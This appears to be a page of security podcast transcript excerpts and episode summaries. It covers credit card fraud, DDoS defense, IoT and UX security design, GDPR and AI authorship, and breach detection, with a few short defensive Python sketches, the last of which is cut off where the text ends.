And it's usually a series: you each have two shots at writing a letter and making your case, so on and so forth. In one case, the fraudulent, stolen credit card I had been given belonged to somebody who actually had a lawnmower shop. In that particular case, the money went out of our account and into this other account, and I said right away, "Honestly, I didn't realize these were fraudulent charges," and it immediately went back into the other person's account. So the person who was compromised fortunately got their money back, and I felt good that that small business owner wasn't duped or stuck.
The problem I had was the fact that we had shipped the goods and almost lost them. So we got hit with some shipping bills and things like that, but it was more the lesson I learned that was powerful: spend that time up front, even if it costs you a little bit of money, to avoid the possibility that you're accepting fraudulent charges. The credit card companies that accept the charges do perform some basic checks. If it's in the United States, they'll do a zip code check or an address check, very basic.
They really don't validate for you 100% that the card is not compromised. There aren't enough checks and balances in place, or security, that can say, "Hey." And really, the onus goes back to you, the business owner. Your name is at the bottom, signed, so they can go after your company or you personally, depending upon what your agreement is. And under most credit card agreements, they can go after you personally if something fraudulent happens. So really be aware of what you sign with your credit card processor.
Andy Green: Right, right. We talk a lot about PCI DSS, the Payment Card Industry Data Security Standard, which is supposed to hold companies that store credit card information to a certain security level. And it's been a little bit controversial, or people, I guess vendors, have had issues with the standard. I was wondering if you had any thoughts on that standard? Is that something that you have implemented, or do you not store credit card numbers so it's not an issue for you, or...?
Scott Schober: I think it's an issue for everyone, because to some degree everybody stores credit card data for a period of time, be it on premises, be it physical, be it a receipt. What we have done, beyond what the standard mandates, is shred old documents with a micro shredder. So a customer will call me up a week later, a month later, a year later, and I'll say, "I'm sorry, I need to get your credit card again." We do it over the phone, traditionally. We say, "Do not email us. Do not fax us your credit card." Even though many people like to do that, there are obvious risks on many fronts why you should not.
A lot of companies, you also have to keep in mind, are storing a lot of their information in the cloud. It's claimed to be secure, claimed to be encrypted, but it's a remote server. I always ask the question, "Do you know where the physical location of that server is?" And most people say, "No." "Do you realize that there is redundancy and backup of that data?" "Well, no." "And do you realize that somewhere in the process that data may not all be encrypted, as they say?" "No, I didn't realize that." So, me, I'm very, very cautious. For our online commerce store, we use a processor, so none of the employees within my organization ever see the credit card.
And that allows some transparency and, I think, some security. You keep it out of our hands; they can buy online. We are never in possession of their physical credit card, or expiration date, or links to their account. And I think that's important, that you can keep that level of security, and it actually helps customers. I've had a couple of customers say, "You know what, you guys do it right. I can just go online and buy it. There's no extra cost or this or that. It's simple to purchase on your store, and I know nobody's holding that credit card." I say, "Great."
Andy Green: Right, and that's a very typical solution to go to a processor like that.
Scott Schober: Exactly.
Andy Green: Although some of them have been hacked, and...
Scott Schober: True, true, that is very true.
Andy Green: But, yeah, that is a very typical solution. And then I... Reading your book, going back to your book, "Hacked Again," there's a series of hacks. I guess it started out sort of with credit cards, but over the years you also experienced a DDoS attack. So, I was wondering if you can tell us a little bit about that. It sounds like one of the earlier ones, and just how you became suspicious and how your ISP responded?
Scott Schober: Yeah, that's an interesting one. And again, I think especially in light of what happened just the other week, a lot more people can understand what in the world that acronym DDoS means. And we learned it firsthand a while back, and felt the pain of it... We have an online commerce store that we've grown over the past few years... We'll typically do maybe $40,000 to $50,000 in commerce per month on our online store, so it's an important piece of revenue for a small business. Then you start to find that your store is very spotty and having problems, and people cannot buy, and it's not one or two people; you start getting the phone calls: "Hey, I can't process an order. I can't access your store. I'm being denied. Is there something wrong?" "Gee, that's funny. Let me try. Wait a second, what's wrong? Let's call the ISP, let's call..." And we started digging in and found out there were waves of periods over time when we'd been out. None of these were prolonged; it wasn't like we were out for an entire week. There were short bursts of an hour at a time, perhaps, when we'd been down.
What we did was get some monitoring hardware in place so we could actually look at the traffic and look at the specific content, the payload, being sent. And sure enough, by analyzing the garbage coming over, it was a classic DDoS attack. So, I always encourage companies, if you are having problems, number one, contact your ISP. They can do some analysis. You may have to go above and beyond that if the problem keeps happening... We eventually had to change everything that we did, unfortunately, from our website to our host to our ISP. We have a dedicated server now with hardware at the server. We have hardware here in front of our firewall as well. Again, layers of security, and that starts to minimize all the problems. And ironically, we actually receive a lot more DDoS attacks now than we ever did, but we're actually blocking them; that's the good news.
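This is not Scott's actual monitoring setup, just a minimal Python sketch of the general idea he describes: watch request rates over time and flag short bursts that far exceed the normal baseline, which is how intermittent DDoS-style outages tend to show up in traffic data.

```python
# Flag time windows whose request volume is far above the typical window.
# Assumes you already have request timestamps (e.g., parsed from access logs).
from collections import Counter

def find_bursts(request_timestamps, window_seconds=60, threshold=10.0):
    """Return (window_start, count) pairs whose count exceeds threshold x the median window."""
    counts = Counter(int(ts) // window_seconds for ts in request_timestamps)
    if not counts:
        return []
    median = sorted(counts.values())[len(counts) // 2]
    return [(w * window_seconds, c) for w, c in sorted(counts.items())
            if median and c > threshold * median]

# Example usage (timestamps would come from your own logs):
# for start, count in find_bursts(timestamps):
#     print(f"possible attack burst starting at t={start}s: {count} requests/min")
```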
Andy Green: Actually, your servers are on premises and...or you're using them...?
Scott Schober: It's not here physically in our building, but we have a dedicated server, as opposed to most companies, where it's usually shared. What starts to happen with a shared server is you start to inherit some of the problems that others on your server have. And sometimes the hackers use that as a backdoor to get access to you, by getting in through what the other guys have. So it's better to just have a dedicated server and pay the extra money.
Andy Green: Okay, that's right.
With data as the new oil, we’ve seen how different companies have responded. From meeting new data privacy compliance obligations to combining multiple anonymized data points to reveal an individual’s identity, it all speaks to how companies are leveraging data as a business strategy. Consumers and companies alike are awakening to data’s possibilities, and we’re only beginning to understand the psyche and power of data.
Tool of the Week: Zorp
Panelists: Cindy Ng, Kilian Englert, Mike Buckbee
By now, we’ve all seen the wildly popular internet of things devices flourish in pop culture, holding much promise and potential for improving our lives. One thing we haven’t seen is IoT devices that are not connected to the internet.
In our follow-up discussion, this is the vision that Simply Secure's executive director Scout Brody advocates, as current IoT devices don’t have a strong foundation in security.
She points out that we should consider whether putting a full internet stack on a new IoT device will actually help the user, as well as the benefits of bringing design thinking to the creation of IoT devices.
Scout Brody: Yes, you know, I like to say, when I'm talking to friends and family about the internet, there are a lot of really interesting, shiny-looking gadgets out there. But as someone who has a background in doing computer security, and also someone who has a background in developing production software in the tech industry, I'm very wary of devices that might live in my home and be connected to the internet. I should say, low power devices, or smaller devices, IoT devices that might be connected to the internet.
And that's because the landscape of security is so underdeveloped. We think about where...I like to draw a parallel between the Internet of Things today and desktop computers in the mid-90s. When desktop computers started going online in the 90s, we had all sorts of problems because the operating systems and the applications that ran on those machines were not designed to be networked. They were not designed, ultimately, with a threat model that involved an attacker trying to probe them constantly in an automated fashion from all directions. And it took the software industry, you know, a couple of decades, really, to get up to speed and to really harden those systems and craft them in a way that they would be resilient to attackers.
And I think that based on the botnet activity that we've seen in just the past year, it's really obvious that a lot of the IoT systems that are around the internet full-time today, are not hardened in the way that they need to be to be resilient against automated attacks. And I think that with IoT systems, it's even scarier than a desktop, or a laptop, or a mobile phone because of the sort of inevitable progression toward intimacy of devices.
If we look at the history of computing, we started out with these massive, god-awful mainframe machines that lived in the basements of the great universities in this country. And we progressed from those devices, you know, through personal computers and now to mobile phones. With each step, these devices have become more integrated into our lives. They have access to more of our personal data and have become ever more important to our daily existence. And IoT really takes us to the next step. It brings these devices not just into our homes, but into our kitchens and our bathrooms, into our bedrooms, and into our living rooms with our children. And the data they have access to is really, frankly, scary. And the idea of exposing that data, that level of intimate interaction with our lives, to the internet without the hardening it deserves is just really scary. So, that's, you know, a bit of a soapbox, but I'm just very cautious about bringing such devices into my home.
However, I see some benefits. I mean, there are certainly...I think that a lot of the devices that are being marketed today with computer smarts in them are, frankly, ridiculous. But there are ways that we could try to mediate their access, or mediate a hacker's access to them, such that they would be a little less scary. One way to do that is, as you mentioned, and as we discussed before, to not have them be directly online. You know, have things be networked via less powerful protocols like Bluetooth Low Energy, or something like that. That poses challenges when it comes to updating the firmware or software on a device, or having the device be able to communicate with the outside world. If we want to be able to turn on the light bulb on the back porch from our phone when we're 100 miles away, that's more difficult if the light bulb is only connected to the rest of our house by Bluetooth, but it's still possible. And I think that's something that we need to explore.
Cindy Ng: Do you think that's where design comes in where, okay, well, now we've created all these IoT devices and we haven't incorporated privacy and security methodologies and concepts in it, but can we...it sounds like we're scrambling to fix things...are we able to bring design thinking, a terminology that's often used in that space, into fixing and improving how we're connecting the device with the data with security and privacy?
Scout Brody: I think so. I mean, I think what's happening today...the sort of, our environment we're in now, people are saying, "Oh, I'm supposed to have smart devices. I want to ship smart devices and sell smart devices because this is a new market. And so, what I'm going to do is, I'm going to take my thermostat, and also my television, and also my light bulb, and also my refrigerator, and also my washer-dryer, and I'm going to just put a full internet stack in them and I'm going to throw them out on the big, bad, internet." Without really stopping to think, what are the needs that actual people have in networking these devices? Like, what are the things that people actually want to be able to do with these devices? How is putting these devices online going to actually improve the lives of the people who buy them? How can we take these devices and make their increased functionality more than just a sales pitch gimmick and really turn this into something that's useful, and usable, and advances their experience?
And I think that we, frankly, need more user research into IoT. We need to understand better what needs people have in their real lives. Say you want to make a smart fridge. How many people, you know, would benefit from a smart fridge? What are the ways that they would benefit? Who are the people that would benefit? What would that really look like? And based on the actual need, then try and figure out how to...and here's where we sort of switch to the security perspective: how do I minimize access? How do I minimize the damage that can be done if this machine is attacked, while still meeting the needs that the humans actually have? Is there a way to provide the functionality that I know people actually want and need, without just throwing it on the internet willy-nilly?
And I think the challenge there is that, you know, we're in an environment that is very competitive, with everyone trying to be the early mover, trying to get their device on the market as soon as possible. We see a lot of startups. We see a lot of companies that don't have any security people, and maybe one or two designers who don't have the opportunity to really go in and do research and understand the actual needs of users. And I think, unfortunately, that's backwards. And until that gets rectified, and you see companies both exploring what it is that people will actually benefit from and how to provide that in a way that minimizes access, I think I will continue to be pretty skeptical about putting such devices in my own home.
Cindy Ng: And so, we've spent some time talking about design concepts and security, and merging them together. How can someone get started? How do they start looking for a UX designer? Is that something that Simply Secure, the nonprofit that you're a part of, can help with in any way?
Scout Brody: Yeah. So, that is actually, kind of, exactly what Simply Secure has set out to do as a nonprofit organization. You know, we recognize that it's important to have this partnership between design and security in order to come up with products that actually meet the needs of people while also keeping them secure and keeping their data protected. And so, Simply Secure works both in a sort of information sharing capacity. We try to, sort of, build a sense of community among designers who are interested in security and privacy topics as well as developers and security folks who are interested in learning more about design. We try to be sort of a community resource. We, on our blog, and our very small but slowly growing GitHub repository, try to share resources that both designers and software developers can use to try and explore and expand their understanding at the intersection of security and design.
We actually, as an organization, do ourselves what we call open research and consulting. And the idea here is that an organization, and it can be any organization, either a small nonprofit consortium organization, in which case, you know, we work with them potentially pro bono. Or, a large for-profit tech company, or a startup, in which case we would, you know, try to figure out some sort of consulting arrangement. But we work with these organizations to help them go through a design process that is simultaneously integrated with their security and privacy process as well. And since we are a nonprofit, we don't just do, sort of, traditional consulting where we go in, do UX research and then come out, you know, with a design that will help the company. We also go through a process of open sourcing that research in such a way that it will benefit the community as a whole. And so the idea here is that by engaging with us, and sort of working with us to come up with a design or research problem...a problem that an organization is having with their software project, they will not only be solving their problem but also be contributing to the community and the advancements of this work as a whole.
With the spring just a few short weeks away, it’s a good time to clean the bedroom windows, dust off the ceiling fans, and discard old security notions that have been taking up valuable mind space.
What do you replace those security concepts with?
How about ones that say that security systems are not binary “on-off” concepts, but instead can be seen as a gentle gradient. And where user experiences developed by researchers create security products that actually, um, work. This new world is conceived by Scout Brody, executive director of Simply Secure, a nonprofit dedicated to leveraging user interface design to make security easier and more intuitive to use.
“UX design is a critical part of any system, including security systems that are only meant to be used by highly technical expert users,” according to Brody. “So if you have a system that helps monitor network traffic, if it’s not usable by the people who are meant to use it, the people it’s designed for, then it’s not actually going to help them do their jobs.”
In the first part of my interview with Scout Brody, we cover why security systems aren’t binary, the value of user interface designers, and how to cross pollinate user personas with threat models.
Cindy Ng: The cornerstone of your work, Scout: you say consumers abdicate their security and privacy for ease and convenience, and because sometimes they're strong-armed into yielding all their personal information in order to download an app or use a piece of technology, because that's how technology is being developed. And you describe security and privacy technologies not as binary concepts but as a gradient. Can you elaborate on what that means?
Scout Brody: Well, Cindy, I think that as security professionals in our field, we tend to think of things in absolutes and we tend to be constantly striving for the ideal. So if you're an I.T. professional working in a corporate environment, you are trying to do your utmost to make the settings as secure as they possibly can be, because that's how you define success as a security professional. When it comes to thinking about security for end-users, however, it's important to recognize that not everyone has the same definition of what security they need to meet their needs or what privacy means to them.
So one good example might be that you have, say, a government worker who lives in Washington, D.C., and who has what we call in the security business a particular threat model: they're worried about certain people accessing their information for professional purposes. They might be concerned about organized crime or foreign governments or all sorts of different things. And that's a very different threat model from someone who is a stay-at-home dad in Minnesota, for example, who may not have those same concerns when he's posting adorable photos of his kids on Facebook, that that information might be compromised or used to hurt him or his professional life in any way.
So I think there is no one definition of what is secure, and I like to talk about usability and design as being a gradient in the same way that security is. In security, although we tend to think of it as an absolute, when we get down to the practice of security, we very rarely say, "Oh, this system is secure." No, we say, "This system is secure against threats A, B, and C"; it's secure in the face of a particular threat model. And similarly, when we talk about a system being usable or useful to end-users, we have to say, "This is usable and useful to these users in these contexts."
Cindy Ng: I like what you mentioned about threat model and context. Can you provide us an example of how you would align a threat model alongside with the technology you have, what would that look like?
Scout Brody: Well, I think it depends. I want to clarify that when we say design, we're talking not just about system architecture design but really about the design of the entire piece of software, including the user interface or, as you would say on the design side, the user experience, or U.X. And U.X. design, I maintain, is a critical part of any system, including security systems, even security systems that are really only meant to be used by highly technical expert users. So if you have an I.T. system that helps monitor network traffic, if it's not usable by the people who are meant to use it, the people it's designed for, then it's not going to actually help them do their job; it's not actually going to be successful as a piece of software.
Re-emphasizing that design doesn't just mean architecture design; it also means design of the user experience. And I think it's really important, when we're looking at the software design process, to consider a partnership between the user experience designer and the software designer, including the security expert. So I think it's important to look at the user experience from a security perspective and to look at the security from a user experience perspective, and that's one of the reasons we advocate a deep partnership between security folks and user experience folks: that they collaborate on the design of the system from the beginning, that they try to understand one another's priorities and concerns, and that they try to use one another's language to talk about those priorities for the system.
Cindy Ng: And when you talk about U.X. design and then design in general, what is the business value of a designer and why is that partnership so critical? Because these days anyone can install Illustrator or Photoshop and start drawing or creating or you can submit a request online for any kind of artwork to be created and within 24 hours, 48 hours you get what you requested. What's the difference between the kind of design I'm talking about versus a partnership?
Scout Brody: Well my favorite analogy when talking to security folks about the importance of, you know, high quality in-house design, is to talk about cryptanalysis or cryptographic protocol design. We do not expect that a designer, a user experience designer or even an average sort of lay person software developer will be able to develop a secure cryptographic protocol. We don't say, "Oh but you know what, I have a terminal window, I've got a text editor, I can write my own cryptographic protocol, I understand prime numbers, I understand, like, the concept of factoring, so therefore I am totally qualified to write a cryptographic protocol." No.
We also don't say, "Oh, well, there are freelance people on the internet that I can hire to write my cryptographic protocols for me, so I'm just going to outsource this: I need a protocol that allows me to change it in this way under these parameters. Hey, freelance cryptographer that I found on a website, can you design this for me?" No, absolutely not. And why is that? It's because we recognize the value of the expertise that goes into designing a cryptographic protocol. We recognize that there are deep concerns, deep nuances that come to bear when a cryptographic protocol is put into place. There are ways in which it can break that are very hard to predict unless you have a lot of background in designing and analyzing these protocols.
It's not quite as extreme when you look at U.X. design, because there are certainly more qualified U.X. designers out there than there are truly qualified cryptographers. But it is an important analogy to draw: we don't expect designers to do cryptography, so why do we expect cryptographers, or software developers in general, to do design? I think there is that assumption that anyone can do design, that anyone can pop open Illustrator and come out with a user experience that is going to be workable. That, or the expectation that you can just hire a freelancer to come in and work for a two-week sprint and put something out for your product, really underestimates the importance of user experience design to the success of your product.
Look at all of the ways in which systems fail, security systems in particular. Security's way of talking about this is, "Oh, humans are the weakest link." And I say, "No, it's not that humans are the weakest link, it's that the user interface you have created or the human policies you have put in place are broken." They're not taking the human system into account in the way that you need to. And that's exactly what U.X. designers and researchers can help you do: understand the users who are going to be using your system, and put in place interfaces and human processes that will allow them to be successful in using your system.
Cindy Ng: You mentioned in a previous conversation we had about U.X. designers developing user personas, can you talk a little bit about why they're used in creating a product you might be building?
Scout Brody: Yeah, so user personas are a handy sort of reference that is created out of a user experience research process. So the idea is that ideally, you know, U.X. designers or researchers have the opportunity to go and spend some quality time talking to people who would ideally be users of the system that's being designed. So if you're designing a system for system administrators like I mentioned earlier, to do network analysis, you know, ideally you'd have the opportunity to go and actually talk to these people. You know, go see them in their workplace, experience the challenges that they face, the things that they're concerned about, the tools that they use today, what they like about them and what they don't like about them. And ideally you would have the opportunity to talk to a great variety of folks who do these things.
And coming out of this research process, you have all of this data about the various different people you talked to. You go through a sort of informal clustering process to try to capture that data in a succinct way, so the user experience designers can then move forward with their design bearing all of that information in mind. That abstraction is called a user persona. The idea is that you talk to 20 different system administrators from around the globe and you come out with four or five user personas that reflect the needs and challenges those users face.
So you might have a user persona named Annabelle, and Annabelle is a very experienced system administrator who is overworked because she has too many meetings and gets too many emails and too many notifications, and is really looking for a system that will help her cut through all of the noise and identify the important signals. And then you might have a user persona named Jim, and Jim is a more junior system administrator who has the time to go through and read every single email notification and understand what it means, and really wants to have lots of detail at his fingertips. So these are two distinct personas, grounded in the actual user research you did, that help inform your design and give you a shorthand for keeping each of these different users' needs in mind as you go through the process of designing your system.
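To make that concrete, here is a minimal sketch, not from the interview, of how a team might capture personas like these as a simple data structure they can reference during design reviews. The class, field names, and values are hypothetical, loosely modeled on the Annabelle and Jim examples above.

```python
from dataclasses import dataclass, field

@dataclass
class UserPersona:
    """A lightweight record distilled from user research interviews (hypothetical schema)."""
    name: str
    role: str
    experience_level: str
    pain_points: list = field(default_factory=list)
    goals: list = field(default_factory=list)

annabelle = UserPersona(
    name="Annabelle",
    role="System administrator",
    experience_level="senior",
    pain_points=["too many meetings", "too many emails and notifications"],
    goals=["cut through the noise", "surface the important signals"],
)

jim = UserPersona(
    name="Jim",
    role="System administrator",
    experience_level="junior",
    pain_points=["needs context for every alert"],
    goals=["read every notification in detail", "have detail at his fingertips"],
)

for persona in (annabelle, jim):
    print(persona)
```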
One really interesting and compelling idea that I've come across over the past couple of years is the notion of taking user personas and cross-pollinating them with threat models. The idea here is: okay, you are a user experience designer and you have these different user personas that you're using to design a system that works for a great diversity of users; can you also consider having personas for your potential attackers? So if you are working in partnership with the security professional on a project, can you say, "Okay, what are the threats that we think are facing our software?"
Okay, we expect that there is going to be an attacker who fits a script-kiddie persona. There is going to be an attacker who is a nation-state actor. We expect there is going to be an organized-crime attacker. And what are the different capabilities of these attackers, and what is our system going to do, both at the architecture level and at the user experience level, to try to be resilient to them? I think it's an interesting way of bringing together the expertise and structure from the two different domains, security and user experience, and working together to highlight the needs and vulnerabilities of the piece of software and process you're trying to develop.
The combination of business and technology-related challenges and the requirement to meet regulatory compliance obligations as well as managing risk is no easy feat. European officials have been disseminating information on how to prevent online scams, general tips as well as warning signs. Other attorneys have been reflecting on legislative developments to prepare for the year ahead. Meanwhile, businesses like Facebook and Reddit are finding their rhythm as they dance between running their business, meeting compliance requirements and keeping their users’ data safe and secure.
Tiffany C. Li is an attorney and Resident Fellow at Yale Law School’s Information Society Project. She frequently writes and speaks on the privacy implications of artificial intelligence, virtual reality, and other technologies. Our discussion is based on her recent paper on the difficulties with getting AI to forget. In this second part, we continue our discussion of GDPR and privacy, and then explore some cutting edge areas of law and technology. Can AI algorithms own their creative efforts? Listen and learn.
But what's missing often is someone who actually knows what that means on the technical end. For example, all the issues that I just brought up are not in that room with the lawyers and policymakers really, unless you bring in someone with a tech background, someone who works on these issues and actually knows what's going on. So this is something that's not just an issue with the right to be forgotten or just with EU privacy law, but really any technology law or policy issue. I think that we definitely need to bridge that gap between technologists and policymakers.
One option is giving it to the designer of the AI system, on the theory that they created the system that is the main impetus for the work being generated in the first place. Another theory is that the person actually running the system, the person who literally flipped the switch and hit run, should own the rights because they provided the creative spark behind the art or the creative work. Other theories exist right now as well. Some people say that there should be no rights to any of the work, because it doesn't make sense to grant rights to those who are not the actual creators of the work. Others say that we should try to figure out a system for giving the rights to the AI itself. And this of course is problematic, because AI can't own anything. And even if it could, even if we got to a world where AI is a sentient being, we don't really know what it would want. We can't pay it. We don't know how it would prefer to be incentivized for its creation, and so on. So a lot of these different theories don't perfectly match up with reality.
But I think the prevailing ideas right now are either to create a contractual basis for figuring this out, or to think of it as a work-for-hire model. In the contractual approach, when you design your system, you sign a contract with whoever you sell it to that lays out all the rights neatly, so you bypass the legal issue entirely. In the work-for-hire model, you think of the AI system as an employee who is simply following the instructions of an employer. In that sense, for example, if you are an employee of Google and you develop a really great product, you don't own the product; Google owns that product, right? It's under the work-for-hire model. So that's one theory.
And what my research is finding is that none of these theories really makes sense, because we're missing one crucial thing. The crucial point they're missing goes back to the very beginning of why we have copyright in the first place, or why we have intellectual property, which is that we want to incentivize the creation of more useful work. We want more artists, we want more musicians, and so on. So the key question, if you look at works created by non-humans, isn't whether we can contractually get around the issue; the key question is what we want to incentivize. Do we want to incentivize work in general, art in general, or do we think there is something unique about human creation, that we want humans to continually be creating things? Those two different paradigms, I think, should be the way we look at this issue in the future. It's a little high level, but I think that's an interesting distinction we haven't paid enough attention to yet when we think about who should own intellectual property for works created by AI, and by non-humans generally.
So in my personal opinion, I believe if we do get to that point, if there are artificially intelligent beings who are as intelligent as humans, who we believe to be almost exactly the same as humans in every way in terms of having intelligence, being able to mimic or feel emotion, and so on, we should definitely look into expanding our definition of citizenship and fundamental rights. I think, of course, there is the opposite view, which is that there is something inherently unique about humanity and there's something unique about life as we see it right now, biological, carbon based life as we see it right now. But I think that's a limited view and I think that that limited view is not something that really serves us well if you consider the universe as a whole and the large expanse of time outside of just these few millennia that humans have been on this earth.
And this is something that, you know, maybe gives too much moral responsibility to the day-to-day actions of most people. But if you consider that any small action within a company can affect the product, and any product can then affect all the users it reaches, you see how easily your one action scales up to affect the people around you, which can then affect even larger areas and possibly the world. Which is not to say, of course, that we should live in fear of having to decide every single aspect of our lives based on its greater impact on the world. But I do think it's important to remember, especially if you are in a role in which you're dealing with things that have a really direct impact on things that matter, like privacy, like free speech, like global human rights values, and so on.
I think it's important to consider ethics and technology definitely. And if we can provide training, if we can make this part of the product design process, if we can make this part of what we expect when hiring people, sure. I think it would be great. Adding it to curriculum, adding tech or information ethics course into the general computer science curriculum for example would be great. I also think that it would be great to have a tech course for the law school curriculum as well. Definitely both sides can learn from each other. We do in general just need to bridge that gap.
It looks at these tech companies and their responsibilities, or their duties, towards users, towards movements, towards governments, and possibly towards the world and larger ideals. So it's a really interesting new initiative, and I would definitely welcome feedback and ideas on these topics. If people want to check out more information, you can head to our website; it's law.yale.edu/isp. And you can also follow me on Twitter @tiffanycli, T-I-F-F-A-N-Y-C-L-I. I would love to hear from any of your listeners and to chat more about all of these fascinating issues.
On the last week of the year, the Inside Out Security panelists reflected on the year’s biggest breaches, scams and fake everything. And is computer security warfare? Well, it depends on who you ask. A 7th grader trying to change her grades isn’t an enemy combatant. But keep in mind as another argues, “There's an opponent who doesn't care about you, doesn't play by the rules, and wants to screw you as fully as possible.”
Panelists: Cindy Ng, Mike Buckbee, Kilian Englert, Kris Keyser
Tiffany C. Li is an attorney and Resident Fellow at Yale Law School’s Information Society Project. She frequently writes and speaks on the privacy implications of artificial intelligence, virtual reality, and other technologies. Our discussion is based on her recent paper on the difficulties with getting AI to forget. In this first part, we talk about the GDPR's "right to be forgotten" rule and the gap between technology and the law.
The right to be forgotten, it's a core principle in the GDPR, where a consumer can request to have their personal data be removed from the internet. And I was wondering if you can speak to the tension between an individual's right to privacy and a company's business interest.
So one argument outside of this consumer versus business tension, one argument really is simply that the right to be forgotten goes against the values of speech and expression, because by requesting that your information or information about you be taken down, you are in some ways silencing someone else's speech.
And I think what's interesting really is that even then people were already discussing this tension that we mentioned before. Both the tension between consumer rights and business interests but also the tension between privacy in general and expression and transparency. So it goes all the way back to 2010, and we're still dealing with the ramifications of that decision now.
And of course, the right to be forgotten has many conditions on it and it's not an ultimate right without, you know, anything protecting all these values we discussed. But I think it should be mentioned that there are consequences, and if we take anything to an extreme, the consequences become, well, extreme.
I think another issue, if we take a step back and think about machine learning algorithms and artificial intelligence, is that personal information can be part of the training data used to train an AI system. Say, for example, you committed a crime, and the fact of that crime and the personal information linked to it are put into an algorithm that determines the likelihood of any person becoming a criminal. After adding in your data, that AI system has a slight bias towards believing that people who are similar to your various data points may be more likely to commit a crime. So when that happens, if you then request that your data be removed from the system, we get into kind of a quandary. If we just remove the data record, there's a possibility of affecting the entire system, because the training data the algorithm was trained on is crucial to the development of the algorithm and of the AI system.
The CIO is responsible for using IT to make the business more efficient. Meanwhile, the CISO is responsible for developing and executing a security program that aims to protect enterprise systems and data from both internal and external threats. At the end of the day, the CISO makes security recommendations, but the CIO has the final say. Perhaps it’s time the CISO gets a seat at the table.
Meanwhile, good Samaritans such as Chris Vickery and Troy Hunt help companies find leaked data, hoping the companies seal the leaks before cybercriminals find them.
Other articles discussed:
Panelists: Cindy Ng, Kilian Englert, Mike Buckbee, Matt Radolec
We need to do better. Exhausting. Dramatic. That’s how the Inside Out Security panelists described our 2018 security landscape. We see the drama unfold weekly on our show and this week was no different.
As facial recognition software becomes more prevalent, we’re seeing it used in security to protect even the biggest stars, like Taylor Swift. Her security team set up a kiosk replaying rehearsal highlights; meanwhile, onlookers who stopped to watch were cross-checked against a database of her known stalkers. What a stealthy way to protect one of our favorite singers in the world!
And here’s a story that’s less wholesome. A few years ago, we thought it was a major threat when ransomware gained prominence. Now cybercriminals have upped the ante, threatening victims with notes claiming that bombs have been planted in their buildings and will go off unless a bitcoin ransom is paid.
Kris is right, we do need to do better. Kilian is right, it’s all exhausting.
Tool of the Week: BloodHoundAD
Panelists: Cindy Ng, Kilian Englert, Mike Buckbee, Kris Keyser
Other articles discussed:
There’s a yin and yang to technology. For instance, we exchange our data for convenience and ease. Unfortunately, Facebook is getting most of the blame when many companies collect many points of data as the default setting.
Meanwhile, as quickly as diligent security pros are eager to adopt and advance security solutions with biometrics, cybercriminals are equally determined to thwart these efforts.
Other articles discussed:
• Google’s plan to mitigate bias in their algorithm
• Australia approves bill, requiring tech companies to provide data upon request
We’ve completed almost 100 podcast panels, and sometimes it feels like we’re talking in circles. Over the years, the security and privacy landscape has gotten more complex, making baseline knowledge amongst industry pros ever more important. Old concepts are often refreshed into current foundational security concepts.
Technological advancements as well as decline also bring forth new challenges. When there’s a decline, we need to reserve the right to change our strategy. For years, users were blamed and labeled as the enemy, but our infrastructure wasn’t built with security in mind. So, perhaps the weakest link in cybersecurity isn't human, but the infrastructure.
When there are advancements, security and privacy need to be baked in from the very beginning. Concerns are already arising with DNA and fitness testing kits as well as what constant surveillance is doing to our brains.
Other articles discussed:
Passwords are easy to use. Everyone knows how they work. However, many security pros point out the inherent design flaws in passwords as a form of authorization and authentication. The good news is that we can reflect on what old technologies can teach new technologies as we’re creating new products and services. One vital concern to keep in mind is terms and conditions, particularly with DNA ownership rights.
Other articles discussed:
Troy Hunt, creator of “Have I been pwned”, gives a virtual keynote that explores how security threats are evolving - and what we need to be especially conscious of in the modern era.
In this keynote, you’ll learn:
and much more!
Troy Hunt: So, let's move on and talk a little bit about detection, because this is another interesting area where we're seeing adversaries within environments, or data breaches having occurred, and then long periods of time passing before anyone realizes what's going wrong. And I think probably one of the most canonical examples of a long lead time for detection is Sony Pictures.
So, if everyone remembers Sony Pictures, this was back in about 2014. Folks came into the office one day, sat down at their PCs, and this is what appeared on the screen: Hacked by GOP, Guardians of Peace. Evidently not so peaceful. And then you could see a whole bunch of hyperlinks down at the bottom as well. And this was Sony's data. And the data that was leaked was massively extensive. The attackers claimed that they'd been in the network for a year and taken about 100 terabytes of data.
I've not seen anything to verify it was quite that long or quite that much, but what we do know is that there was a huge amount of data taken. So, things like unreleased films, sensitive internal emails, some of those emails caused a huge amount of embarrassment because they were disparaging towards Obama, which wasn't a great move. Also, things like employee data with social security numbers and they're kind of important in the U.S.
And one of the things that I find really fascinating about those three different classes of data, the unreleased films, sensitive internal emails, and employee data is that it's not like these are just all sitting on a shared folder somewhere. They're not there in one location. These are the sorts of assets, particularly in a large organization, like Sony Pictures, which would have been distributed into very, very different corners of the organization. So, it's from all over the place. And someone's had enough time to go and retrieve very large amounts of data from different locations within the network, exfiltrate them, and then eventually upload them to those locations.
So, this was really devastating. And it's really interesting now to look at just how much stuff is exposed in organizations, which is what enables things like this. I'll give you a bit of an example here. Varonis produced a report earlier this year, ''The 2018 Global Data Risk Report'', and they found that 21% of all folders in an organization are open to everyone. So, if you're in a corporate environment, just have a look around you at just how much stuff is open. I spent a lot of years in a corporate environment, and I would see this all the time: folders that were open to everyone. And why do people do it? Because it's easy. They're taking shortcuts. Fifty-eight percent of organizations have over 100,000 folders open to everyone. A hundred thousand folders that are open to everyone.
Now, obviously, these are large organizations, and of course the larger the organization, the harder it is to manage this sort of stuff. But that is just a staggeringly high number. I remember back in my corporate role, some of you know where that was, I would find these open folders. And I'd go to my leadership and I'd say, ''Look, we've got a lot of open folders. We've got to stop doing this. This is going to work out badly.'' And the fix was always to secure the folder. And what that ultimately was, was just treating the symptom. It's like, ''Hey, we found something. It's been open, let's close it.'' And I would drive and drive and drive to say, ''Look, there is an underlying root cause which is causing these folders to be opened in the first place.''
And what it boiled down to was a whole bunch of people having the ability to open them up in the first place who shouldn't have. A whole bunch of people had server admin rights to places they shouldn't have. And those are harder problems to solve. But if your only means of detection is some bloke having a browse around the network in his spare time and finding too much stuff open, then that's probably not a good place to be in. So, we're seeing way too much stuff, way too open, for way too long.
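As a rough illustration of the kind of check being described, here is a minimal sketch that walks a directory tree on a POSIX system and flags folders whose permission bits make them readable by everyone. It is an approximation only; auditing Windows file shares of the sort the Varonis report covers means inspecting ACLs and group membership, and the share root path used below is hypothetical.

```python
import os
import stat

def find_world_readable_dirs(root):
    """Walk a directory tree and report folders readable (or writable) by everyone."""
    open_dirs = []
    for dirpath, _dirnames, _filenames in os.walk(root):
        mode = os.stat(dirpath).st_mode
        if mode & stat.S_IROTH:  # the "other" read bit is set
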